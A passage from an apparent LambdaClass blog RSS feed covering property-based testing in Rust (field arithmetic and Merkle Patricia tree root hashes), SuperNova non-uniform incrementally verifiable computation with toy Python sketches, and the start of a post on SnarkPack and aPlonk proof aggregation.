&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Property-based test that ensures, for 100 {x} and {y} values that are randomly generated each time tests are run, that multiplication between two felts {x} and {y} doesn&amp;#39;t fall outside the range [0, PRIME-1]. The values of {x} and {y} can be either 0 or a very large number.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  fn mul_in_range(ref x in &amp;quot;(0|[1-9][0-9]*)&amp;quot;, ref y in &amp;quot;(0|[1-9][0-9]*)&amp;quot;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let x = &amp;amp;Felt::parse_bytes(x.as_bytes(), 10).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let y = &amp;amp;Felt::parse_bytes(y.as_bytes(), 10).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p = &amp;amp;BigUint::parse_bytes(PRIME_STR[2..].as_bytes(), 16).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let prod = x * y;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let as_uint = &amp;amp;prod.to_biguint();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prop_assert!(as_uint &amp;lt; p, &amp;quot;{}&amp;quot;, as_uint);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Using a suite of property-based tests for each arithmetic operation, we have already found two hard-to-find bugs. The suite also let us swap our field elements’ internal implementation for a more performant one while staying confident that we didn’t break anything.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;case-study-2-patricia-merkle-tree&quot;&gt;Case study 2: Patricia Merkle Tree&lt;&#x2F;h3&gt;
&lt;p&gt;At LambdaClass, we are also developing a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;merkle_patricia_tree&quot;&gt;Merkle Patricia tree library&lt;&#x2F;a&gt; (like those used in Ethereum and many other cryptography-related projects). To test the correctness of the implementation, we decided to make property-based tests by comparing the results of our library’s operations against the results of a reference implementation, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;citahub&#x2F;cita-trie&quot;&gt;cita-trie&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;For testing, let’s generate some inputs for creating two trees: one using the reference implementation and one using our library.&lt;br &#x2F;&gt;
This time, the property we want to test is that, for every tree generated with our library, its root hash matches the root hash of the reference implementation.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn proptest_compare_root_hashes(path in vec(any::&amp;lt;u8&amp;gt;(), 1..32), value in vec(any::&amp;lt;u8&amp;gt;(), 1..100)) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  use cita_trie::MemoryDB;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  use cita_trie::{PatriciaTrie, Trie};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  use hasher::HasherKeccak;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Prepare the data for inserting it into the tree&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let data: Vec&amp;lt;(Vec&amp;lt;u8&amp;gt;, Vec&amp;lt;u8&amp;gt;)&amp;gt; = vec![(path, value)];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Creates an empty patricia Merkle tree using our library and &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Keccak256 as the hashing algorithm.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let mut tree = PatriciaMerkleTree::&amp;lt;_, _, Keccak256&amp;gt;::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; insert the data into the tree.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  for (key, val) in data.clone().into_iter() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    tree.insert(key, val);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; computes the root hash using our library&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let root_hash = tree.compute_hash().as_slice().to_vec();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Creates a cita-trie implementation of the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Patricia Merkle tree.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let memdb = Arc::new(MemoryDB::new(true));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let hasher = Arc::new(HasherKeccak::new());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let mut trie = PatriciaTrie::new(Arc::clone(&amp;amp;memdb), Arc::clone(&amp;amp;hasher));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Insert the data into the cita-trie tree.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  for (key, value) in data {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trie.insert(key.to_vec(), value.to_vec()).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  &#x2F;&#x2F; Calculates the cita-tree&amp;#39;s root hash.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  let reference_root = trie.root().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  prop_assert_eq!(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    reference_root,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    root_hash&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Using this technique, we can ensure that our implementation behaves the same way as the reference one.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;closing-words&quot;&gt;Closing words&lt;&#x2F;h2&gt;
&lt;p&gt;In conclusion, property-based testing is a powerful and effective way to test the correctness of our programs. Testing properties helps find bugs and ensure that our program meets invariants across a wide range of inputs. In this article, we demonstrated property-based testing in two open-source projects. We hope you consider it in your testing practices.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;related-resources&quot;&gt;Related Resources&lt;&#x2F;h2&gt;
&lt;ol&gt;
&lt;li&gt;The original QuickCheck paper: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cs.tufts.edu&#x2F;~nr&#x2F;cs257&#x2F;archive&#x2F;john-hughes&#x2F;quick.pdf&quot;&gt;QuickCheck: A Lightweight Tool for Random Testing of Haskell Programs&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;em&gt;Property-Based Testing with PropEr, Erlang, and Elixir&lt;&#x2F;em&gt; by Fred Hebert: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;propertesting.com&#x2F;&quot;&gt;propertesting.com&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;Rust port of QuickCheck: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;BurntSushi&#x2F;quickcheck&quot;&gt;quickcheck&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;altsysrq.github.io&#x2F;proptest-book&#x2F;intro.html&quot;&gt;proptest book&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;</description>
      </item>
      <item>
          <title>Champagne SuperNova, incrementally verifiable computation</title>
          <pubDate>Thu, 02 Feb 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/champagne-supernova-incrementally-verifiable-computation-2/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/champagne-supernova-incrementally-verifiable-computation-2/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/champagne-supernova-incrementally-verifiable-computation-2/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;In the last few posts, we’ve been writing about proving systems and incrementally verifiable computation:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;&#x2F;pinocchio-virtual-machine-nearly-practical-verifiable-computation&#x2F;&quot;&gt;Pinocchio Virtual Machine: Nearly Practical Verifiable Computation&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a href=&quot;&#x2F;decentralized-private-computations-zexe-and-veri-zexe&#x2F;&quot;&gt;Decentralized private computation: ZEXE and VERI-ZEXE&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a href=&quot;&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;Incrementally verifiable computation: NOVA&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Incremental proof systems offer some advantages over conventional proving systems:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;They do not require static bounds on loop iterations, making them better suited for programs with dynamic control flow.&lt;&#x2F;li&gt;
&lt;li&gt;They require minimal memory overhead: the prover only needs space proportional to a single step of the computation instead of storing the whole computation trace.&lt;&#x2F;li&gt;
&lt;li&gt;They are well suited to distributing and parallelizing proof generation.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;The prover can run the program, keeping track of the input and output variables and state changes, and then generate the proofs in parallel using CPU or GPU for each step of the computation. Better still, the proofs can be conveniently aggregated into a single one, which the verifier can check.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;a href=&quot;&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;Incrementally verifiable computation&lt;&#x2F;a&gt; (IVC) offers an approach to prove the integrity of machine executions. To use IVC, we need to design a universal circuit that can perform any machine-supported instruction, and at each step we have to invoke this circuit. This is inconvenient since the cost of proving a step is proportional to the size of the universal circuit, even when the step executes a single instruction whose own circuit would be much smaller. One way to deal with this shortcoming is to construct virtual machines with a minimal instruction set, bounding the size of the universal circuit.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1758&quot;&gt;SuperNova&lt;&#x2F;a&gt; provides a cryptographic proof system (comprising a prover and a verifier) based on a virtual machine and a program designed to run over such a machine, satisfying the following properties:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Succinctness: the size of the proof and the time to verify it are at most polylogarithmic in the execution time of the program.&lt;&#x2F;li&gt;
&lt;li&gt;Zero-knowledge: the proof does not reveal anything other than the correct execution of the program.&lt;&#x2F;li&gt;
&lt;li&gt;Convenient cost profile: the cost of proving a step of the program is proportional to the size of the circuit representing that instruction.&lt;&#x2F;li&gt;
&lt;li&gt;Incremental proof generation: the prover can generate a proof for each step of the program’s execution independently and later combine those proofs into a single one without increasing the proof size.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;SuperNova leverages folding schemes (a cryptographic primitive used previously by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;microsoft&#x2F;Nova&quot;&gt;Nova&lt;&#x2F;a&gt;), using relaxed-committed &lt;a href=&quot;&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;R1CS&lt;&#x2F;a&gt;, to realize a non-uniform IVC. SuperNova is a generalization of Nova, as it supports machines with a rich instruction set (Nova was limited to one instruction). In the following sections, we will break down the different components needed for SuperNova and how to achieve non-uniform IVC.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;commitment-scheme-for-vectors&quot;&gt;Commitment scheme for vectors&lt;&#x2F;h2&gt;
&lt;p&gt;A &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;commitment scheme&lt;&#x2F;a&gt; for vectors is a collection of three efficient algorithms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Parameter generation, $\mathrm{Gen}(1^\lambda)=pp$: given a security level parameter, $\lambda$, the algorithm outputs public parameters $pp$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Commit, $\mathrm{commit}(pp,x,r)=\mathrm{cm}$: given the public parameters, a vector, and some randomness, $r$, outputs a commitment $\mathrm{cm}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Open, $\mathrm{open}(pp,\mathrm{cm},x,r)={0,1}$: given a commitment, the vector, randomness, and public parameters, the algorithm verifies whether the commitment given corresponds to the vector $x$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The commitment scheme has to satisfy the following properties:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Binding: given a commitment $\mathrm{cm}$, it is impossible to find two $x_1$, $x_2$ such that $\mathrm{commit}(pp,x_1,r)=\mathrm{commit}(pp,x_2,r)$. Simply put, the commitment binds us to our original value $x$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hiding: the commitment reveals nothing from $x$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The following two properties are useful in our context and satisfied by some commitment schemes, such as Pedersen’s:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Additively homomorphic: given $x_1$, $x_2$ a commitment is additively homomorphic if $\mathrm{commit}(pp,x_1+x_2,r_1+r_2)=\mathrm{commit}(pp,x_1,r_1)+\mathrm{commit}(pp,x_2,r_2)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Succinct: the size of the commitment is much smaller than the corresponding vector (for example, logarithmic in the length of $x$).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
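&lt;p&gt;To make the additive homomorphism concrete, here is a toy Pedersen-style vector commitment written multiplicatively (the group operation is multiplication mod $p$, so adding committed vectors corresponds to multiplying commitments). The parameters are illustrative only and far too small to be secure:&lt;&#x2F;p&gt;

```python
# Toy Pedersen-style vector commitment over the prime-order subgroup of
# squares in Z_p^*. Hypothetical parameters -- NOT cryptographically secure.
p = 1019          # safe prime: p = 2*q + 1
q = 509           # order of the subgroup of squares mod p
gens = [pow(b, 2, p) for b in (2, 3, 5, 11)]  # one generator per vector entry
h = pow(7, 2, p)  # independent generator hiding the randomness

def commit(x, r):
    # cm = h^r * prod(g_i^{x_i}) mod p  (exponents live mod q)
    acc = pow(h, r % q, p)
    for g_i, x_i in zip(gens, x):
        acc = acc * pow(g_i, x_i % q, p) % p
    return acc

x1, r1 = [1, 2, 3, 4], 17
x2, r2 = [5, 0, 7, 1], 23
lhs = commit([a + b for a, b in zip(x1, x2)], r1 + r2)
rhs = commit(x1, r1) * commit(x2, r2) % p
assert lhs == rhs  # additive homomorphism, written multiplicatively here
```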
&lt;p&gt;SuperNova can be instantiated with any commitment scheme satisfying the four properties above, such as Pedersen’s, KZG, or Dory.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;computational-model-of-non-uniform-ivc-nivc&quot;&gt;Computational model of non-uniform IVC (NIVC)&lt;&#x2F;h2&gt;
&lt;p&gt;We can think of the program as a collection of $n+1$ non-deterministic, polynomial-time computable functions, ${f_1,f_2,…,f_n,\phi}$, where each function takes $k$ input variables and produces $k$ output variables; each $f_j$ can also take non-deterministic input. The function $\phi$ takes the state and non-deterministic input and outputs an index $j=\phi(x,w)$, choosing one of the $f_i$. Each function is represented as a rank-one constraint system (R1CS), an NP-complete problem. In IVC, the prover at step $k$ takes as input $(k,x_0,x)$ and a proof $\Pi_k$ attesting knowledge of witnesses $(w_0,w_1,…,w_{k-1})$ such that&lt;br &#x2F;&gt;
$$ x_{j+1}=F(x_j,w_j) $$&lt;br &#x2F;&gt;
for all $j=0,1,…,k-1$, with $x=x_k$. In other words, given a proof that the previous step was computed correctly and the current state $x_k$, we get the next state $x_{k+1}$ and a proof $\Pi_{k+1}$ showing that we computed step $k$ correctly. In the NIVC setting, $\phi$ selects which function we are going to use,&lt;br &#x2F;&gt;
$$ x_{j+1}=F_{\phi(x_j,w_j)} (x_j,w_j) $$&lt;&#x2F;p&gt;
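&lt;p&gt;A minimal sketch of this recurrence, with toy stand-ins for the instructions and the selector (none of this is SuperNova’s actual code):&lt;&#x2F;p&gt;

```python
# Toy model of the NIVC step: phi selects which instruction runs next.
# The functions, selector, and state below are illustrative stand-ins only.
def f_add(z, w):
    return z + w          # instruction 0: add the witness to the state

def f_double(z, w):
    return 2 * z          # instruction 1: double the state

functions = [f_add, f_double]

def phi(z, w):
    return z % 2          # toy selector: pick the instruction by parity

def run(x0, witnesses):
    x = x0
    for w in witnesses:
        pc = phi(x, w)            # pc_{i+1} = phi(x_i, w_i)
        x = functions[pc](x, w)   # x_{i+1} = F_{phi(x_i, w_i)}(x_i, w_i)
    return x

assert run(3, [4, 0, 1]) == 7
```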
&lt;p&gt;At each step, SuperNova folds an R1CS instance and its witness, representing the last step of the program’s execution, into a running instance (it takes two $N$-sized NP instances into a single $N$-sized NP instance). The prover uses an augmented circuit containing a verifier circuit and the circuit corresponding to the function $f_j$ being executed. The verifier circuit comprises the non-interactive folding scheme and a circuit for computing $\phi$. We will represent the augmented functions as $f^\prime_j$.&lt;&#x2F;p&gt;
&lt;p&gt;One problem with the folding scheme is that we have multiple instructions, each with its own R1CS representation. We could take the path of universal circuits, but this would make us pay a high cost for many cheap instructions. In Nova, we avoided the problem since we only had one type of instruction. To deal with multiple instructions, SuperNova works with $n$ running instances $U_i$, where the $j$-th running instance attests to all previous executions of $f^\prime_j$ up to step $i-1$. Therefore, checking all the running instances is equivalent to checking all $i-1$ previous steps. Each $f^\prime_j$ takes as input $u_i$, the instance corresponding to step $i$, and folds it into the running instance of the function being executed. We can think of it as looking at the function we want to execute and folding the new instance with the one accumulating its previous executions. By doing so, we pay the cost of each instruction only when it is used, at the expense of keeping more running instances and updating them accordingly.&lt;&#x2F;p&gt;
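&lt;p&gt;The bookkeeping can be sketched as follows; the &lt;code&gt;fold&lt;&#x2F;code&gt; function below is a toy random linear combination, not Nova’s actual folding scheme, and all names are illustrative:&lt;&#x2F;p&gt;

```python
# Toy illustration of keeping one running instance per instruction and
# folding each step's instance into the matching slot. The "fold" here is
# just a random linear combination of two same-size vectors.
import random

def fold(U_j, u, r):
    return [a + r * b for a, b in zip(U_j, u)]

n = 3                                   # number of instructions
U = [[0, 0] for _ in range(n)]          # one running instance per f_j
trace = [(0, [1, 2]), (2, [3, 4]), (0, [5, 6])]  # (pc_i, step instance u_i)

for pc, u in trace:
    r = random.randrange(1, 97)         # verifier challenge
    U[pc] = fold(U[pc], u, r)           # only the used instruction pays

# instruction 1 was never executed, so its running instance is untouched
assert U[1] == [0, 0]
```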
&lt;p&gt;The verifier circuit corresponding to $f_j^\prime$ does the following steps:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Checks that $U_i$ and $pc_i=\phi(x_{i-1},w_{i-1})$ (the index of the function executed previously) are contained in the public output of the instance $u_i$. This enforces that the previous step produces both $U_i$ and $pc_i$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Runs the folding scheme&amp;#39;s verifier to fold an instance and updates the running instances, $U_{i+1}$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Calls $\phi(x_i,w_i)=pc_{i+1}$ to obtain the index of the following function to invoke.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;IVC is a powerful cryptographic primitive that allows us to prove the integrity of a computation in an incremental fashion. This strategy is well suited for virtual machine executions and general programs with dynamic control flow. We could achieve this using universal circuits, but at the expense of paying a considerable cost for each instruction, no matter how cheap it is. Nova introduced folding schemes, allowing one to realize IVC for a single instruction. SuperNova generalizes Nova to multiple instructions by adding a selector function $\phi$, which chooses the instruction to be executed at each step. To support several instructions, SuperNova maintains separate bookkeeping for each function’s execution. This construction has many exciting applications, since we can realize IVC without paying for an expensive universal circuit at every step.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Proof aggregation schemes:  SnarkPack and aPlonk</title>
          <pubDate>Fri, 27 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/proof-aggregation-schemes/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/proof-aggregation-schemes/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/proof-aggregation-schemes/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;zk-SNARKs&lt;&#x2F;a&gt; are powerful cryptographic primitives, allowing one party, known as the prover, to show to a second party, the verifier, that they know a given secret, without revealing anything about it. This has applications, for example, in decentralized private computations, where we can delegate an expensive computation to an untrusted server and receive cryptographic proof attesting to the correctness of the computation, without leaking sensitive information. We can also leverage zk-SNARKs to solve the problems of privacy and scalability affecting most decentralized ledgers. There, each node must perform the computation independently to check its validity. This means that less powerful devices can act as bottlenecks, especially when the computations are expensive, affecting scalability. However, instead of having each node re-execute each computation, we could have them verify a short proof that shows that the computation is correct. In that case, we can lessen the burden on the entire system.&lt;&#x2F;p&gt;
&lt;p&gt;One of the main problems with zk-SNARKs is the proof’s generation time. Typically, proof generation involves transforming computations into some NP-complete problem, where we can prove the correctness of the calculation. Among them are &lt;a href=&quot;&#x2F;how-to-transform-code-into-arithmetic-circuits&#x2F;&quot;&gt;arithmetic circuit satisfiability&lt;&#x2F;a&gt; or systems of quadratic constraints (rank one constraint system, R1CS). We then have to perform some expensive computations, such as multiscalar multiplications (&lt;a href=&quot;&#x2F;multiscalar-multiplication-strategies-and-challenges&#x2F;&quot;&gt;MSM&lt;&#x2F;a&gt;) and elliptic curve pairings to check the solution. Several strategies have been adopted to lessen the computational cost, such as proof composition, batching, recursion, dealing with an increased number of smaller proofs, and exploiting the advantages of polynomial commitment schemes.&lt;&#x2F;p&gt;
&lt;p&gt;In a &lt;a href=&quot;&#x2F;incrementally-verifiable-computation-nova&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;, we covered incrementally verifiable computation (IVC) and folding schemes, which give us ways to realize IVC in practice. We covered the basics of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;microsoft&#x2F;Nova&quot;&gt;Nova&lt;&#x2F;a&gt; and how the folding scheme works. We will now turn our attention to proof aggregation schemes: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;529.pdf&quot;&gt;SNARKPack&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2022&#x2F;1352.pdf&quot;&gt;aPlonK&lt;&#x2F;a&gt;. These allow us to reduce the total size of the proofs and their associated verification time: for \( n \) proofs, the size and verification time of the aggregated proof will be \( \mathcal{O}(\log(n)) \), which is a significant reduction, especially for a large number of proofs. SNARKPack is built on top of the Groth16 SNARK, while aPlonk works with the &lt;a href=&quot;&#x2F;the-hunting-of-the-zk-snark&#x2F;&quot;&gt;Plonk&lt;&#x2F;a&gt; proving system. Both are among the most widely used SNARKs and use trusted setups, resulting from setup ceremonies involving multi-party computations.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;snarkpack&quot;&gt;SNARKPack&lt;&#x2F;h2&gt;
